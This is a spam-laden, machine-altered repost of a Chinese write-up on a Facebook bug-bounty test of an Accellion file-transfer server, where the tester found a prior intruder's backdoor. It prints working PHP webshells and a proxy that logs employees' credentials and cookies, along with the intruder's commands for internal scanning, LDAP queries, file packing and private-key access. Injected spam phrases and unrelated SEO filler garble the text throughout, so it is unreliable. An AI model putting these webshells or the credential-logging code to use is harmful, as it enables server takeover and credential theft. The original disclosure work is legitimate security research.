红客将军追款-滲透 Facebook 的思路與發現
How I Hacked Facebook, and Found Someone’s Backdoor Script (English Version)
滲透 Facebook 的思路與發現 (汉语版本号)
寫在小故事以前
身為一位滲透測試人員,相比 Client Side 的弱點我更喜欢 Server Side 的手机上点开黑客入侵的网页页面攻擊,能夠立即的操纵伺服驱动器、獲取權限实际操作 SHELL 才爽 <( ̄︶ ̄)>
當然一次极致的滲透一切方式的弱點都不能小覷,在實際滲透時偶爾還是必须些 Client Side 弱點組合能够更极致的操纵伺服驱动器,可是在尋找弱點時我自身还是先偏重以可立即进入伺服驱动器的 *** 來去尋找風險高、能長驅直穿的弱點。
隨著 Facebook 当今世界越來越火紅、用戶量越來越多,一直以來都是有要想嘗試看一下的念头,正巧 Facebook 在 2012 年開始拥有 Bug Bounty 獎金獵人的機制讓我更躍躍欲試。
一般如由滲透的视角來說習慣耐热性會從搜集资料、偵查開始,更先定义出目標在網道上的 手机上点开黑客入侵的网页页面 “範圍” 有多大,暂且能够評估一下從何處比较有機會着手。比如:
Google Hacking 到什么资料?
用了幾個 B 段的 IP ? C 段的 IP ?
Whois? Reverse Whois?
用了什么网站域名? 内部应用的网站域名? 接著做二级域名的猜測、掃描
企业平时愛用什麼樣技术、设备?
在 Github, Pastebin 上是不是有洩漏什么資訊?
…etc
當然 Bug Bounty 並并不是讓你無限定的攻擊,將所蒐集到的範圍與 Bug Bounty 手机上点开黑客入侵的网页页面 所允許的範圍做相交後才就是你真实能够去嘗試的目標。
一般來說大企业在滲透中比較非常容易出现的问題點這裡舉幾個事例來探討
對多數大企业来讲,”網路邊界” 是比较難顧及、非常容易出现问題的一塊,當企业規模越大,同時擁有數千、數萬台機器在線,網管很難顧及到每台機器。在防御裡,防御要防的是一個面,但攻擊只需找個一個點就可以提升,因此 防御方手机上点开黑客入侵的网页页面相對處於弱勢,攻擊者要是寻找一台位於網路邊界的機器侵入進随后能够開始在內網實現滲透了!
對於 “連網设备” 的安全性意識相對欠缺,由於連網设备一般不會出示 SHELL 給管理 *** 員做進一步的实际操作,只有由设备自身所出示的界面設定,因此 一般對於设备的防禦全是從網路層來抵擋,但如碰到设备自身的 0-Day 或是是 1-Day 很有可能連被侵入了也不自覺。
人的安全性,隨著 “社会工作者庫” 的兴起,有時能够讓一次滲透的步骤變得異常簡單,從公開资料找到企业員工目录,再從社会工作者庫寻找能够登陆 VPN 的員工密碼就可以開始實現內網滲透,特别是在當社会工作者庫數量越來越多 “量變成質變” 時要是原則角色的密碼在社会工作者庫中可寻找,那工廠的安全系数就完全提升 :P
理所當然在尋找 Facebook 弱點時會以平时實現滲透的思路實現,在開始收集资料時除开針對 Facebook 自身网站域名查詢外也對註冊邮箱實現 Reverse Whois 出现意外發現了個奇特的网站域名名稱
tfbnw.net
TFBNW 好像是 “TheFacebook Network” 的縮寫
再意谓公開资料發現存有下边這台這台伺服驱动器
vpn.tfbnw.net
哇! vpn.tfbnw.net 看上去來是個 Juniper SSL VPN 的登陆界面,不過版本号滿新的没有立即可运用的弱點,不過這也成为了进入後面小故事的開端。
TFBNW 看起来是 Facebook 內部用的网站域名,來掃掃 vpn.tfbnw.net 同手机上点开黑客入侵的网页页面網段看會有哪些麼發現
Mail Server Outlook Web App
F5 BIGIP SSL VPN
CISCO ASA SSL VPN
Oracle E-Business
MobileIron MDM
從這幾台機器大概能够判斷这个網段對於 Facebook 來說應該是相對关键的網段,之後一切的小故事就從這裡開始。
弱點發現
在同網段中,發現一台特別的伺服驱动器
files.fb.com
↑ files.fb.com 登陆界面
從 手机上点开黑客入侵的网页页面 LOGO 及其 Footer 判斷应该是 Accellion 的 Secure File Transfer (下列簡稱 FTA)
FTA 為一款標榜安全性檔案傳輸的产品,可讓使用人線上共享、同歩檔案,並融合 AD, LDAP, Kerberos 等 Single Sign-on 機制,Enterprise 版本号更援助 SSL VPN 聯絡。
更先见到 FTA 的之一件事是去網道上搜尋是不是有公開的 Exploit 能够运用,Exploit 近期的是由 HD Moore 發現並發佈在 Rapid7 的這篇 Advisory
Accellion File Transfer Appliance 手机上点开黑客入侵的网页页面 Vulnerabilities (CVE-2015-2856, CVE-2015-2857)
弱點中可立即從 “/tws/getStatus” 中洩漏的版本号資訊判斷是不是可运用,在發現 files.fb.com 時版本号已從有系统漏洞的 0.18 升级至 0.20 了,不過就從 Advisory 中所表露的精彩片段程序碼感覺 FTA 的撰寫风格假如再繼續挖手机上点开黑客入侵的网页页面掘很有可能还是會有问題存有的,因此 這時的对策便開始往尋找 FTA 产品的 0-Day 前進!
不過從實際黑箱子的 *** 其實找不到什么问題點只能想辦法將方位轉為白箱測試,透過各種 *** 取得舊版的 FTA 初始碼後終於能够開始科学研究了!
整個 FTA 产品大概架構
網頁端界面关键由 Perl 及其 PHP 構成
PHP 初始碼皆經過 IonCube 数据加密
在情况跑了許多 Perl 的 Daemon
更先是破译 IonCude 的一部分,許多设备為了避免 自身的产品被檢視因此 會將初始碼数据加密,不過好在 FTA 上的 IonCude 版本号沒到全新,能够应用現成的工手机上点开黑客入侵的网页页面具破译,不過由於 PHP 版本号的问題,細節部分及其數值運算等很有可能要努力修復一下,要不然有點難看…
經過簡單的初始碼審查後發現,比较好找的弱點应该都被 Rapid7 找离开了 T^T
而必须認證才可以觸發的系统漏洞又不怎麼功能强大,只能認真點往深層一點的地区发掘!
經過幾天的認真发掘,最後總共發現了七個弱點,在其中包括了
Cross-Site Scripting x 3
Pre-Auth SQL Injection leads to Remote Code Execution
Known-Secret-Key leads to 手机上点开黑客入侵的网页页面 Remote Code Execution
Local Privilege Escalation x 2
除开回報 Facebook 安全性團隊外,其餘的弱點也製做成 Advisory 递交 Accellion 技术对话框,經過廠商修補递交 CERT/CC 後获得四個 CVE 編號
CVE-2016-2350
CVE-2016-2351
CVE-2016-2352
CVE-2016-2353
詳細的弱點細節會待 Full Disclosure Policy 後发布!
↑ 应用 Pre-Auth SQL Injection 寫入 Webshell
在實際滲透中進去伺服驱动器後的之一件事儿便是檢視當前的环境是不是對自身友好,為了要讓自身能够在伺服驱动器上待的久就需要盡很有可能的手机上点开黑客入侵的网页页面掌握伺服驱动器上面有何限定、紀錄,避開很有可能會被發現的風險 :P
Facebook 大概有下列限定:
防火安全牆无法連外, TCP, UDP, 53, 80, 443 皆无法
存有遠端 Syslog 伺服驱动器
開啟 Auditd 記錄
無法外連看起来有點麻煩,可是 ICMP Tunnel 看起来是行得通的,但這仅仅一個 Bug Bounty Program 其實不用太麻煩就純粹以 Webshell 实际操作就可以。
好像有點怪异?
正當搜集證據準備回報 Facebook 安全性團隊時,從網頁日誌中好像见到一些怪异的痕跡。
更先是在 “/var/opt/apache/php_error_log” 中见到一些怪异的 PHP 錯誤訊息,從錯誤訊息來看好像好像邊改 Code 邊執行所產生的手机上点开黑客入侵的网页页面錯誤?
↑ PHP error log
跟隨錯誤訊息的路徑去看看發現疑是先人留有的 Webshell 後門
↑ Webshell on facebook server
在其中幾個檔案的内容以下
sshpass
沒錯,便是那個 sshpass
bN3d10Aw.php
<?php echo shell_exec($_GET['c']); ?>
手机上点开黑客入侵的网页页面uploader.php
<?php move_uploaded_file($_FILES["f]["tmp_name"], basename($_FILES["f"]["name"])); ?>
d.php
<?php include_oncce("/home/seos/c ourier/remote.inc"); echo decrypt($_GET["c"]); ?>
sclient_user_class_standard.inc
<?php
include_once('sclient_user_class_standard.inc.orig');
$fp = fopen("/home/seos/courier/B3dKe9sQaa0L.log", "a");
$retries = 0;
$max_retries = 100;
// 省略...
fwrite($fp, date("手机点开黑客攻击的网页Y-m-d H:i:s T") . ";" . $_SERVER["REMOTE_ADDR"] . ";" . $_SERVER["HTTP_USER_AGENT"] . ";POST=" . http_build_query($_POST) . ";GET=" . http_build_query($_GET) . ";COOKIE=" . http_build_query($_COOKIE) . "\n");
// 省略...
前幾個就是很標準手机点开黑客攻击的网页的 PHP 一句話木馬
其中比較特別的是 “sclient_user_class_standard.inc” 這個檔案
include_once 中 “sclient_user_class_standard.inc.orig” 為原本對密碼進行驗證的 PHP 程式,駭客做了一個 Proxy 在中間並在進行一些重要操作時先把 GET, POST, COOKIE 的值記錄起來
整理一下,駭客做了一個 Proxy 在密碼驗證的地方,並且記錄 Facebook 員工的帳號密碼,並且將記錄到的密碼放置在 Web 目錄下,駭客每隔一段時間使用 wget 抓取
wget https://files.fb.com/courier/B3dKe9sQaa0L.log
↑ Logged passwords
從紀錄裡面可以看到除了使用者帳號密碼外,還有從 FTA 要求檔案時的信件內容,記錄到的帳號密碼會定時 Rotate 手机点开黑客攻击的网页 (後文會提及,這點還滿機車的XD)
發現當下,最近一次的 Rotate 從 2/1 記錄到 2/7 共約 300 筆帳號密碼紀錄,大多都是 “@fb.com” 或是 “@facebook.com” 的員工帳密,看到當下覺得事情有點嚴重了,在 FTA 中,使用者的登入主要有兩種模式
一般用戶註冊,密碼 Hash 存在資料庫,由 SHA256 + SALT 儲存
Facebook 員工 (@fb.com) 則走統一認證,使用 LDAP 由 AD 認證
在這裡相信記錄到的是真實的員工帳號密碼,**猜測** 這份帳號密碼應該可以通行 Facebook Mail OWA, VPN 等服務做更進一步的滲透…
此外,這名 “駭客” 可能習慣不太好 :P
後門參數皆使用 GET 來傳遞,在網頁日誌可以很明顯的發現他的足跡
駭客在進行一些指令操作時沒顧慮到 STDERR ,導致網頁日誌中很多指令的錯誤訊息,從中可以觀察駭客做了哪些操作
從 access.log 可以觀察到的每隔數日駭客會將記錄到的帳手机点开黑客攻击的网页號密碼清空
192.168.54.13 - - 17955 [Sat, 23 Jan 2016 19:04:10 +0000 | 1453575850] "GET /courier/custom_template/1000/bN3dl0Aw.php?c=./sshpass -p '********' ssh -v -o StrictHostKeyChecking=no soggycat@localhost 'cp /home/seos/courier/B3dKe9sQaa0L.log /home/seos/courier/B3dKe9sQaa0L.log.2; echo > /home/seos/courier/B3手机点开黑客攻击的网页dKe9sQaa0L.log' 2>/dev/stdout HTTP/1.1" 200 2559 ...
打包檔案
cat tmp_list3_2 | while read line; do cp /home/filex2/1000/$line files; done 2>/dev/stdout
tar -czvf files.tar.gz files
對內部網路結構進行探測
dig a archibus.thefacebook.com
telnet archibus.facebook.com 80
curl http://archibus.thefacebook.com/spaceview_facebook/locator/room.php
dig a records.fb.com
telnet records.fb.com 80
telnet records.fb.com 443
wget -O- -q http://192.168.41.16
dig a acme.facebook.com
./sshpass -p '********' ssh -v -o 手机点开黑客攻击的网页 StrictHostKeyChecking=no soggycat@localhost 'for i in $(seq 201 1 255); do for j in $(seq 0 1 255); do echo "192.168.$i.$j:`dig +short ptr $j.$i.168.192.in-addr.arpa`"; done; done' 2>/dev/stdout
...
使用 Shell Script 進行內網掃描但忘記把 STDERR 導掉XD
嘗試對內部 LDAP 進行連接
sh: -c: line 0: syntax error near unexpected token `('
sh: -c: line 0: `ldapsearch -v -x -H 手机点开黑客攻击的网页 ldaps://ldap.thefacebook.com -b CN=svc-accellion,OU=Service Accounts,DC=thefacebook,DC=com -w '********' -s base (objectclass=*) 2>/dev/stdout'
嘗試訪問內部網路資源
( 看起來 Mail OWA 可以直接訪問 …)
--20:38:09-- https://mail.thefacebook.com/
Resolving mail.thefacebook.com... 手机点开黑客攻击的网页 192.168.52.37
Connecting to mail.thefacebook.com|192.168.52.37|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://mail.thefacebook.com/owa/ [following]
--20:38:10-- https://mail.thefacebook.com/owa/
Reusing existing connection to mail.thefacebook.com:443.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://mail.thefacebook.com/owa/auth/logon.aspx?url=https://mail.thefacebook.com/owa/&reason=0 [following]
--20:38:10-- https://mail.thefacebook.com/owa/auth/logon.aspx?url=https://mail.thefacebook.com/owa/&reason=0
Reusing 手机点开黑客攻击的网页 existing connection to mail.thefacebook.com:443.
HTTP request sent, awaiting response... 200 OK
Length: 8902 (8.7K) [text/html]
Saving to: `STDOUT'
0K ........ 100% 1.17G=0s
20:38:10 (1.17 GB/s) - `-' saved [8902/8902]
--20:38:手机点开黑客攻击的网页33-- (try:15) https://10.8.151.47/
Connecting to 10.8.151.47:443... --20:38:51-- https://svn.thefacebook.com/
Resolving svn.thefacebook.com... failed: Name or service not known.
--20:39:03-- https:// *** -dev.thefacebook.com/
Resolving *** -dev.thefacebook.com... failed: Name or service not 手机点开黑客攻击的网页 known.
failed: Connection timed out.
Retrying.
嘗試對 SSL Private Key 下手
sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied
ls: /etc/opt/apache/ssl.key/server.key: No such file or directory
mv: cannot stat `x': No such file or directory
sh: 手机点开黑客攻击的网页 /etc/opt/apache/ssl.crt/server.crt: Permission denied
mv: cannot stat `x': No such file or directory
sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied
mv: cannot stat `x': No such file or directory
sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied
mv: cannot stat `x': No such file or 手机点开黑客攻击的网页 directory
sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied
mv: cannot stat `x': No such file or directory
sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied
base64: invalid input
從瀏覽器觀察 files.fb.com 的憑證還是 Wildcard 的 *.fb.com …
後記
在收集完足夠證據後便立即回報給 Facebook 安全團隊,回報內容除了漏洞細節外,還附上相對應的 Log 、截圖以及時間紀錄xD
從伺服器中的日誌可以發現有兩個時間點是明顯駭客在操作系統的時間,一個是七月初、另個是九月中旬
七月初的動作從紀錄中來看起來比較偏向 “逛” 伺服器,但九月中旬的操作就比較惡意了,除了逛街外,還放置了密碼 Logger 等,至於兩個時間點的 “駭客” 是不是同一個人就不得而知了 :P
而七月發生的時機點正好接近 CVE-2015-2857 Exploit 公手机点开黑客攻击的网页佈前,究竟是透過 1-Day 還是無 0-Day 入侵系統也無從得知了。
這件事情就記錄到這裡,總體來說這是一個非常有趣的經歷xD
也讓我有這個機會可以來寫寫關於滲透的一些文章 :P
最後也感謝 Bug Bounty 及胸襟寬闊的 Facebook 安全團隊 讓我可以完整記錄這起事件 : )
Timeline
手机点开黑客攻击的网页2016/02/05 20:05 提供漏洞詳情給 Facebook 安全團隊
2016/02/05 20:08 收到機器人自動回覆
2016/02/06 05:21 提供弱點 Advisory 給 Accellion 技術窗口
2016/02/06 07:42 收到 Thomas 的回覆,告知調查中
2016/02/13 07:43 收到 Reginaldo 的回覆,告知 Bug Bounty 獎金 $10000 USD
2016/02/13 詢問是否撰寫 Blog 是否有任何要注意的地方?
2016/手机点开黑客攻击的网页02/13 詢問此漏洞被認為是 RCE 還是 SQL Injection
2016/02/18 收到 Reginaldo 的回覆,告知正在進行調查中,希望 Blog 先暫時不要發出
2016/02/24 收到 Hai 的回覆,告知獎金將會於三月發送
2016/04/20 收到 Reginaldo 的回覆,告知調查已完成
我知道的重庆国信投资控股有限公司持有重庆信托67%的股权,请问国信投资控股有限公司还持有哪些公司的股权,网上说是重庆国资委下属公司,但是重庆国资委。红客将军追款
德国西门子ct价格表[黑客2113帝国2:重5261装上阵4102].The.Matrix.Reloaded.2003.BluRay.1080p.x264.DTS-WiKi.mkv 手机点开黑客攻击的网页 。qt358940580 是你的百度云id吗?共享给你了黑客帝国2.BD1280超清国英双语中英双字种子下载地址: LS说的不对吧,仔细看看一,一的结尾特工史密斯杀死了尼奥,却触发了黑客尼奥内置的“救世主”,尼奥复活升级为救世主,杀死史密斯,起到杀毒软件作用的特工被。
红客将军追款一般情况下不会有任何提示,能被入侵肯定是中了木马病毒,建议安装手机安全软件。
首先基础是必然要掌握的、电脑基础也就是2个部分硬件和软件、选择购买一个产品首先你要看牌子和参数懂得怎么选择性价比高或者质量好有逼格的电脑、其次会。
安全专手机点开黑客攻击的网页家:Linux操作系统存在安全漏洞2002年03月12日13:36新浪科技 *** 安全专家最近指出,Linux操作系统软件压缩资料库中。红客将军追款
世界十大黑客分别是:KevinMitnick、JonathanJames、Anonymous、AlbertGonzalez、KevinPoulsen、GaryMcKinnon、。
红客将军追款。斯诺登是黑客,他到底是好人还是坏人。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
